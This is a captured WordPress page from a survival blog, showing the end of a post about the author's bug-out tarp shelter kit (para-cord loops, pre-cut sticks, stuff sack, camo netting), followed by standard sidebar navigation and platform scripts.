https://sensiblesurvival.files.wordpress.com/2017/09/10-stake-bundle.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/10-stake-bundle.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Some small loops of para-cord come in handy for certain set-ups.  I carry six pre-made loops bundled together with a hair band.<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/11-small-loop/" rel="attachment wp-att-3248"><img data-attachment-id="3248" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/11-small-loop/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/11-small-loop.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366534&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.04&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="11 small loop" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/11-small-loop.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/11-small-loop.jpg?w=497" class="aligncenter size-large wp-image-3248" src="https://sensiblesurvival.files.wordpress.com/2017/09/11-small-loop.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/11-small-loop.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/11-small-loop.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/11-small-loop.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/11-small-loop.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/11-small-loop.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/12-small-loops/" rel="attachment wp-att-3249"><img data-attachment-id="3249" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/12-small-loops/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/12-small-loops.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366520&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.066666666666667&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="12 small loops" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/12-small-loops.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/12-small-loops.jpg?w=497" class="aligncenter size-large wp-image-3249" src="https://sensiblesurvival.files.wordpress.com/2017/09/12-small-loops.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/12-small-loops.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/12-small-loops.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/12-small-loops.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/12-small-loops.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/12-small-loops.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>I carry four little sticks that are pre-cut to about two inches long.  These are used for tarp attachments and to secure easy release knots (more on this later).<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/13-short-sticks/" rel="attachment wp-att-3250"><img data-attachment-id="3250" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/13-short-sticks/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/13-short-sticks.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366555&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.05&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="13 short sticks" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/13-short-sticks.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/13-short-sticks.jpg?w=497" class="aligncenter size-large wp-image-3250" src="https://sensiblesurvival.files.wordpress.com/2017/09/13-short-sticks.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/13-short-sticks.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/13-short-sticks.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/13-short-sticks.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/13-short-sticks.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/13-short-sticks.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>All of the lines, stakes, and etc. are stored in a small stuff-sack.<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/14-stuff-sack/" rel="attachment wp-att-3251"><img data-attachment-id="3251" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/14-stuff-sack/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/14-stuff-sack.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366060&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.066666666666667&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="14 stuff sack" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/14-stuff-sack.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/14-stuff-sack.jpg?w=497" class="aligncenter size-large wp-image-3251" src="https://sensiblesurvival.files.wordpress.com/2017/09/14-stuff-sack.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/14-stuff-sack.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/14-stuff-sack.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/14-stuff-sack.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/14-stuff-sack.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/14-stuff-sack.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>The last item in my kit is a piece of camo netting that I can drape across the front of my shelter to help conceal it.<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/15-camo-netting/" rel="attachment wp-att-3252"><img data-attachment-id="3252" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/15-camo-netting/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/15-camo-netting.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366030&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.076923076923077&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="15 camo netting" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/15-camo-netting.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/15-camo-netting.jpg?w=497" class="aligncenter size-large wp-image-3252" src="https://sensiblesurvival.files.wordpress.com/2017/09/15-camo-netting.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/15-camo-netting.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/15-camo-netting.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/15-camo-netting.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/15-camo-netting.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/15-camo-netting.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>So, that’s my tarp kit.  In subsequent posts I will show you how to make several tarp set-ups using the items in this kit.</p> </div><!--end entry--> <div class="post-footer"> <div class="comments"> <a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/#comments">1 Comment</a> </div><!-- .comments --> </div><!--end post footer--> </div><!--end post--> <div class="navigation index"> <div class="alignleft"><a href="https://sensiblesurvival.org/page/2/" >&laquo; Older Entries</a></div> <div class="alignright"></div> </div><!--end navigation--> </div><!--end content--> <div id="sidebar"> <ul> <li id="categories-2" class="widget widget_categories"><h2 class="widgettitle">Categories</h2> <ul> <li class="cat-item cat-item-345430359"><a href="https://sensiblesurvival.org/category/archery-modern/">Archery, Modern</a> </li> <li class="cat-item cat-item-73260471"><a href="https://sensiblesurvival.org/category/archery-primitive/">Archery, Primitive</a> </li> <li class="cat-item cat-item-73254708"><a href="https://sensiblesurvival.org/category/bug-out-bags-and-survival-kits/">Bug Out Bags and Survival Kits</a> </li> <li class="cat-item cat-item-74177674"><a href="https://sensiblesurvival.org/category/edible-and-useful-wild-plants/">Edible and Useful Wild Plants</a> </li> <li class="cat-item cat-item-73256915"><a href="https://sensiblesurvival.org/category/fires-and-fire-building/">Fires and Fire Building</a> </li> <li class="cat-item cat-item-73256884"><a href="https://sensiblesurvival.org/category/fishing-modern-equipment/">Fishing, Modern Equipment</a> </li> <li class="cat-item cat-item-73256858"><a href="https://sensiblesurvival.org/category/fishing-primitive/">Fishing, Primitive</a> </li> <li class="cat-item cat-item-6092164"><a href="https://sensiblesurvival.org/category/food-preparation-and-recipes/">Food Preparation and Recipes</a> </li> <li class="cat-item cat-item-35208852"><a href="https://sensiblesurvival.org/category/food-storage-2/">Food Storage</a> </li> <li class="cat-item cat-item-74177700"><a href="https://sensiblesurvival.org/category/food-storage-food-preparation-and-recipes/">Food Storage, Food Preparation and Recipes</a> </li> <li class="cat-item cat-item-73256764"><a href="https://sensiblesurvival.org/category/gardening-and-food-production/">Gardening and Food Production</a> </li> <li class="cat-item cat-item-73256432"><a href="https://sensiblesurvival.org/category/home-power-heat-light-and-communications/">Home Power, Heat, Light, and Communications</a> </li> <li class="cat-item cat-item-149426904"><a href="https://sensiblesurvival.org/category/hunting-trapping-and-tracking/">Hunting, Trapping, and Tracking</a> </li> <li class="cat-item cat-item-50"><a href="https://sensiblesurvival.org/category/medical/">Medical</a> </li> <li class="cat-item cat-item-4690"><a href="https://sensiblesurvival.org/category/modern/">Modern</a> </li> <li class="cat-item cat-item-108778471"><a href="https://sensiblesurvival.org/category/orienteering-and-land-navigation/">Orienteering and Land Navigation</a> </li> <li class="cat-item cat-item-1981"><a href="https://sensiblesurvival.org/category/tools/">Tools</a> </li> <li class="cat-item cat-item-15988166"><a href="https://sensiblesurvival.org/category/tools-modern/">Tools, Modern</a> </li> <li class="cat-item cat-item-73255798"><a href="https://sensiblesurvival.org/category/tools-primitive/">Tools, Primitive</a> </li> <li class="cat-item cat-item-2401"><a href="https://sensiblesurvival.org/category/transportation/">Transportation</a> </li> <li class="cat-item cat-item-16723"><a href="https://sensiblesurvival.org/category/trapping/">Trapping</a> </li> <li class="cat-item cat-item-1"><a href="https://sensiblesurvival.org/category/uncategorized/">Uncategorized</a> </li> <li class="cat-item cat-item-73256042"><a href="https://sensiblesurvival.org/category/weapons-modern/">Weapons, Modern</a> </li> <li class="cat-item cat-item-73256236"><a href="https://sensiblesurvival.org/category/weapons-primitive/">Weapons, Primitive</a> </li> </ul> </li> <li id="recent-posts-2" class="widget widget_recent_entries"> <h2 class="widgettitle">Recent Posts</h2> <ul> <li> <a href="https://sensiblesurvival.org/2018/08/24/13-things-youll-wish-you-had-when-your-smart-phone-is-useless/">13 Things You’ll Wish You had when Your Smart Phone is&nbsp;Useless</a> </li> <li> <a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/">Make Dutch Oven&nbsp;Biscuits</a> </li> <li> <a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/">Outdoor Cookware</a> </li> <li> <a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/">Outdoor Cooking Equipment</a> </li> <li> <a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/">Other Set-Ups for the Plow Point&nbsp;Tarp</a> </li> </ul> </li> <li id="archives-2" class="widget widget_archive"><h2 class="widgettitle">Archives</h2> <ul> <li><a href='https://sensiblesurvival.org/2018/08/'>August 2018</a></li> <li><a href='https://sensiblesurvival.org/2018/07/'>July 2018</a></li> <li><a href='https://sensiblesurvival.org/2018/06/'>June 2018</a></li> <li><a href='https://sensiblesurvival.org/2018/04/'>April 2018</a></li> <li><a href='https://sensiblesurvival.org/2017/11/'>November 2017</a></li> <li><a href='https://sensiblesurvival.org/2017/10/'>October 2017</a></li> <li><a href='https://sensiblesurvival.org/2017/09/'>September 2017</a></li> <li><a href='https://sensiblesurvival.org/2017/08/'>August 2017</a></li> <li><a href='https://sensiblesurvival.org/2017/07/'>July 2017</a></li> <li><a href='https://sensiblesurvival.org/2017/04/'>April 2017</a></li> <li><a href='https://sensiblesurvival.org/2017/03/'>March 2017</a></li> <li><a href='https://sensiblesurvival.org/2017/01/'>January 2017</a></li> <li><a href='https://sensiblesurvival.org/2016/11/'>November 2016</a></li> <li><a href='https://sensiblesurvival.org/2016/09/'>September 2016</a></li> <li><a href='https://sensiblesurvival.org/2016/08/'>August 2016</a></li> <li><a href='https://sensiblesurvival.org/2016/07/'>July 2016</a></li> <li><a href='https://sensiblesurvival.org/2016/06/'>June 2016</a></li> <li><a href='https://sensiblesurvival.org/2016/05/'>May 2016</a></li> <li><a href='https://sensiblesurvival.org/2016/04/'>April 2016</a></li> <li><a href='https://sensiblesurvival.org/2016/03/'>March 2016</a></li> <li><a href='https://sensiblesurvival.org/2016/01/'>January 2016</a></li> <li><a href='https://sensiblesurvival.org/2015/12/'>December 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/11/'>November 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/10/'>October 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/09/'>September 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/08/'>August 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/06/'>June 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/05/'>May 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/04/'>April 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/03/'>March 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/02/'>February 2015</a></li> <li><a href='https://sensiblesurvival.org/2015/01/'>January 2015</a></li> <li><a href='https://sensiblesurvival.org/2014/12/'>December 2014</a></li> <li><a href='https://sensiblesurvival.org/2014/11/'>November 2014</a></li> <li><a href='https://sensiblesurvival.org/2014/10/'>October 2014</a></li> <li><a href='https://sensiblesurvival.org/2014/09/'>September 2014</a></li> <li><a href='https://sensiblesurvival.org/2014/07/'>July 2014</a></li> <li><a href='https://sensiblesurvival.org/2014/06/'>June 2014</a></li> <li><a href='https://sensiblesurvival.org/2014/05/'>May 2014</a></li> <li><a href='https://sensiblesurvival.org/2014/03/'>March 2014</a></li> <li><a href='https://sensiblesurvival.org/2014/02/'>February 2014</a></li> <li><a href='https://sensiblesurvival.org/2014/01/'>January 2014</a></li> <li><a href='https://sensiblesurvival.org/2013/12/'>December 2013</a></li> <li><a href='https://sensiblesurvival.org/2013/11/'>November 2013</a></li> <li><a href='https://sensiblesurvival.org/2013/10/'>October 2013</a></li> <li><a href='https://sensiblesurvival.org/2013/09/'>September 2013</a></li> <li><a href='https://sensiblesurvival.org/2013/08/'>August 2013</a></li> <li><a href='https://sensiblesurvival.org/2013/04/'>April 2013</a></li> <li><a href='https://sensiblesurvival.org/2013/03/'>March 2013</a></li> <li><a href='https://sensiblesurvival.org/2013/02/'>February 2013</a></li> <li><a href='https://sensiblesurvival.org/2013/01/'>January 2013</a></li> <li><a href='https://sensiblesurvival.org/2012/12/'>December 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/11/'>November 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/10/'>October 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/09/'>September 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/08/'>August 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/07/'>July 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/06/'>June 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/05/'>May 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/04/'>April 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/03/'>March 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/02/'>February 2012</a></li> <li><a href='https://sensiblesurvival.org/2012/01/'>January 2012</a></li> <li><a href='https://sensiblesurvival.org/2011/12/'>December 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/11/'>November 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/10/'>October 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/09/'>September 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/08/'>August 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/07/'>July 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/06/'>June 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/05/'>May 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/04/'>April 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/03/'>March 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/02/'>February 2011</a></li> <li><a href='https://sensiblesurvival.org/2011/01/'>January 2011</a></li> <li><a href='https://sensiblesurvival.org/2010/12/'>December 2010</a></li> <li><a href='https://sensiblesurvival.org/2009/10/'>October 2009</a></li> <li><a href='https://sensiblesurvival.org/2009/09/'>September 2009</a></li> <li><a href='https://sensiblesurvival.org/2009/07/'>July 2009</a></li> <li><a href='https://sensiblesurvival.org/2009/06/'>June 2009</a></li> <li><a href='https://sensiblesurvival.org/2009/04/'>April 2009</a></li> <li><a href='https://sensiblesurvival.org/2009/03/'>March 2009</a></li> <li><a href='https://sensiblesurvival.org/2009/02/'>February 2009</a></li> <li><a href='https://sensiblesurvival.org/2009/01/'>January 2009</a></li> <li><a href='https://sensiblesurvival.org/2008/12/'>December 2008</a></li> <li><a href='https://sensiblesurvival.org/2008/11/'>November 2008</a></li> </ul> </li> <li id="meta-2" class="widget widget_meta"><h2 class="widgettitle">Meta</h2> <ul> <li><a href="https://wordpress.com/start?ref=wplogin">Register</a></li> <li><a href="https://sensiblesurvival.wordpress.com/wp-login.php">Log in</a></li> <li><a href="https://sensiblesurvival.org/feed/">Entries <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://sensiblesurvival.org/comments/feed/">Comments <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://wordpress.com/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.com</a></li> </ul> </li> </ul> </div><!--end sidebar--></div><!--end wrapper--> </div><!--end content-background--> <div id="footer"> <div class="wrapper clear"> <div id="copyright"> <p class="copyright-notice"><a href="https://wordpress.com/?ref=footer_blog">Blog at WordPress.com.</a></p> </div> </div><!--end wrapper--> </div><!--end footer--> <script type="text/javascript"> //<![CDATA[ var infiniteScroll = JSON.parse( decodeURIComponent( '%7B%22settings%22%3A%7B%22id%22%3A%22content%22%2C%22ajaxurl%22%3A%22https%3A%5C%2F%5C%2Fsensiblesurvival.org%5C%2F%3Finfinity%3Dscrolling%22%2C%22type%22%3A%22scroll%22%2C%22wrapper%22%3Atrue%2C%22wrapper_class%22%3A%22infinite-wrap%22%2C%22footer%22%3Atrue%2C%22click_handle%22%3A%221%22%2C%22text%22%3A%22Older%20posts%22%2C%22totop%22%3A%22Scroll%20back%20to%20top%22%2C%22currentday%22%3A%2213.09.17%22%2C%22order%22%3A%22DESC%22%2C%22scripts%22%3A%5B%5D%2C%22styles%22%3A%5B%5D%2C%22google_analytics%22%3Afalse%2C%22offset%22%3A0%2C%22history%22%3A%7B%22host%22%3A%22sensiblesurvival.org%22%2C%22path%22%3A%22%5C%2Fpage%5C%2F%25d%5C%2F%22%2C%22use_trailing_slashes%22%3Atrue%2C%22parameters%22%3A%22%22%7D%2C%22query_args%22%3A%7B%22error%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A0%2C%22post_parent%22%3A%22%22%2C%22subpost%22%3A%22%22%2C%22subpost_id%22%3A%22%22%2C%22attachment%22%3A%22%22%2C%22attachment_id%22%3A0%2C%22name%22%3A%22%22%2C%22pagename%22%3A%22%22%2C%22page_id%22%3A0%2C%22second%22%3A%22%22%2C%22minute%22%3A%22%22%2C%22hour%22%3A%22%22%2C%22day%22%3A0%2C%22monthnum%22%3A0%2C%22year%22%3A0%2C%22w%22%3A0%2C%22category_name%22%3A%22%22%2C%22tag%22%3A%22%22%2C%22cat%22%3A%22%22%2C%22tag_id%22%3A%22%22%2C%22author%22%3A%22%22%2C%22author_name%22%3A%22%22%2C%22feed%22%3A%22%22%2C%22tb%22%3A%22%22%2C%22paged%22%3A0%2C%22meta_key%22%3A%22%22%2C%22meta_value%22%3A%22%22%2C%22preview%22%3A%22%22%2C%22s%22%3A%22%22%2C%22sentence%22%3A%22%22%2C%22title%22%3A%22%22%2C%22fields%22%3A%22%22%2C%22menu_order%22%3A%22%22%2C%22embed%22%3A%22%22%2C%22category__in%22%3A%5B%5D%2C%22category__not_in%22%3A%5B%5D%2C%22category__and%22%3A%5B%5D%2C%22post__in%22%3A%5B%5D%2C%22post__not_in%22%3A%5B%5D%2C%22post_name__in%22%3A%5B%5D%2C%22tag__in%22%3A%5B%5D%2C%22tag__not_in%22%3A%5B%5D%2C%22tag__and%22%3A%5B%5D%2C%22tag_slug__in%22%3A%5B%5D%2C%22tag_slug__and%22%3A%5B%5D%2C%22post_parent__in%22%3A%5B%5D%2C%22post_parent__not_in%22%3A%5B%5D%2C%22author__in%22%3A%5B%5D%2C%22author__not_in%22%3A%5B%5D%2C%22posts_per_page%22%3A7%2C%22ignore_sticky_posts%22%3Afalse%2C%22suppress_filters%22%3Afalse%2C%22cache_results%22%3Afalse%2C%22update_post_term_cache%22%3Atrue%2C%22lazy_load_term_meta%22%3Atrue%2C%22update_post_meta_cache%22%3Atrue%2C%22post_type%22%3A%22%22%2C%22nopaging%22%3Afalse%2C%22comments_per_page%22%3A%2250%22%2C%22no_found_rows%22%3Afalse%2C%22order%22%3A%22DESC%22%7D%2C%22last_post_date%22%3A%222017-09-13%2011%3A31%3A00%22%2C%22stats%22%3A%22blog%3D29864982%26v%3Dwpcom%26tz%3D-5%26user_id%3D0%26subd%3Dsensiblesurvival%26x_pagetype%3Dinfinite%22%7D%7D' ) ); //]]> </script> <!-- --> <script type='text/javascript' src='//0.gravatar.com/js/gprofiles.js?ver=201920y'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1380573781h'></script> <script> //initialize and attach hovercards to all gravatars jQuery( document ).ready( function( $ ) { if (typeof Gravatar === "undefined"){ return; } if ( typeof Gravatar.init !== "function" ) { return; } Gravatar.profile_cb = function( hash, id ) { WPGroHo.syncProfileData( hash, id ); }; Gravatar.my_hash = WPGroHo.my_hash; Gravatar.init( 'body', '#wp-admin-bar-my-account' ); }); </script> <div style="display:none"> </div> <script type='text/javascript'> /* <![CDATA[ */ var HighlanderComments = {"loggingInText":"Logging In\u2026","submittingText":"Posting Comment\u2026","postCommentText":"Post Comment","connectingToText":"Connecting to %s","commentingAsText":"%1$s: You are commenting using your %2$s account.","logoutText":"Log Out","loginText":"Log In","connectURL":"https:\/\/sensiblesurvival.wordpress.com\/public.api\/connect\/?action=request&domain=sensiblesurvival.org","logoutURL":"https:\/\/sensiblesurvival.wordpress.com\/wp-login.php?action=logout&_wpnonce=b319ed9855","homeURL":"https:\/\/sensiblesurvival.org\/","postID":"3352","gravDefault":"identicon","enterACommentError":"Please enter a comment","enterEmailError":"Please enter your email address here","invalidEmailError":"Invalid email address","enterAuthorError":"Please enter your name here","gravatarFromEmail":"This picture will show whenever you leave a comment. Click to customize it.","logInToExternalAccount":"Log in to use details from one of these accounts.","change":"Change","changeAccount":"Change Account","comment_registration":"0","userIsLoggedIn":"","isJetpack":"","text_direction":"ltr"}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??/wp-content/js/jquery/jquery.autoresize.js,/wp-content/mu-plugins/highlander-comments/script.js?m=1551752381j'></script> <div id="infinite-footer"> <div class="container"> <div class="blog-info"> <a id="infinity-blog-title" href="https://sensiblesurvival.org/" rel="home"> Sensible Survival </a> </div> <div class="blog-credits"> <a href="https://wordpress.com/?ref=footer_blog">Blog at WordPress.com.</a> </div> </div> </div><!-- #infinite-footer --> <div id="carousel-reblog-box"> <form action="#" name="carousel-reblog"> <textarea id="carousel-reblog-content" name="carousel-reblog-content" placeholder="Add your thoughts here... (optional)"></textarea> <label for="carousel-reblog-to-blog-id" id="carousel-reblog-lblogid">Post to</label> <select name="carousel-reblog-to-blog-id" id="carousel-reblog-to-blog-id"> </select> <div class="submit"> <span class="canceltext"><a href="#" class="cancel">Cancel</a></span> <input type="submit" name="carousel-reblog-submit" class="button" id="carousel-reblog-submit" value="Reblog Post" /> <input type="hidden" id="carousel-reblog-blog-id" value="29864982" /> <input type="hidden" id="carousel-reblog-blog-url" value="https://sensiblesurvival.org" /> <input type="hidden" id="carousel-reblog-blog-title" value="Sensible Survival" /> <input type="hidden" id="carousel-reblog-post-url" value="" /> <input type="hidden" id="carousel-reblog-post-title" value="" /> </div> <input type="hidden" id="_wpnonce" name="_wpnonce" value="b8217d2509" /><input type="hidden" name="_wp_http_referer" value="/" /> </form> <div class="arrow"></div> </div> <link rel='stylesheet' id='all-css-0-3' href='https://s0.wp.com/_static/??/wp-content/mu-plugins/carousel/jetpack-carousel.css,/wp-content/mu-plugins/tiled-gallery/tiled-gallery.css?m=1524699534j&cssminify=yes' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var actionbardata = {"siteID":"29864982","siteName":"Sensible Survival","siteURL":"https:\/\/sensiblesurvival.org","icon":"<img alt='' src='https:\/\/s2.wp.com\/i\/logo\/wpcom-gray-white.png' class='avatar avatar-50' height='50' width='50' \/>","canManageOptions":"","canCustomizeSite":"","isFollowing":"","themeSlug":"pub\/titan","signupURL":"https:\/\/wordpress.com\/start\/","loginURL":"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Fsensiblesurvival.org%2F2018%2F08%2F24%2F13-things-youll-wish-you-had-when-your-smart-phone-is-useless%2F&signup_flow=account&domain=sensiblesurvival.org","themeURL":"","xhrURL":"https:\/\/sensiblesurvival.org\/wp-admin\/admin-ajax.php","nonce":"1c05bece34","isSingular":"","isFolded":"","isLoggedIn":"","isMobile":"","subscribeNonce":"<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"cb48cb7fe9\" \/>","referer":"https:\/\/sensiblesurvival.org\/","canFollow":"1","feedID":"2475606","statusMessage":"","customizeLink":"https:\/\/sensiblesurvival.wordpress.com\/wp-admin\/customize.php?url=https%3A%2F%2Fsensiblesurvival.wordpress.com%2F","i18n":{"view":"View site","follow":"Follow","following":"Following","edit":"Edit","login":"Log in","signup":"Sign up","customize":"Customize","report":"Report this content","themeInfo":"Get theme: Titan","shortlink":"Copy shortlink","copied":"Copied","followedText":"New posts from this site will now appear in your <a href=\"https:\/\/wordpress.com\/\">Reader<\/a>","foldBar":"Collapse this bar","unfoldBar":"Expand this bar","editSubs":"Manage subscriptions","viewReader":"View site in Reader","viewReadPost":"View post in Reader","subscribe":"Sign me up","enterEmail":"Enter your email address","followers":"Join 161 other followers","alreadyUser":"Already have a WordPress.com account? <a 